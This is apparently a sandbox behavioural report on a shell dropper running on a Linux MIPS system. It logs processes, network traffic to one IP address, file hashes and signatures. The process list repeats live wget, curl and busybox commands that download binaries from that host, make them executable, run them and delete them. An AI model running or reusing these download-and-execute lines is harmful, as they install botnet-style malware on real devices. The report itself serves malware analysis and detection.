[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/843-1-0xb6719000-0xb672a044-memory.dmp
memory/861-2-0xb6740000-0xb6751044-memory.dmp
memory/861-3-0xb6758000-0xb6769044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
debian9-mipsbe-20240611-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/chmod
[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/rm
[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/wget
[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/chmod
[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/rm
[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/wget
[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/chmod
[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/rm
[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/wget
[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/chmod
[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/rm
[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
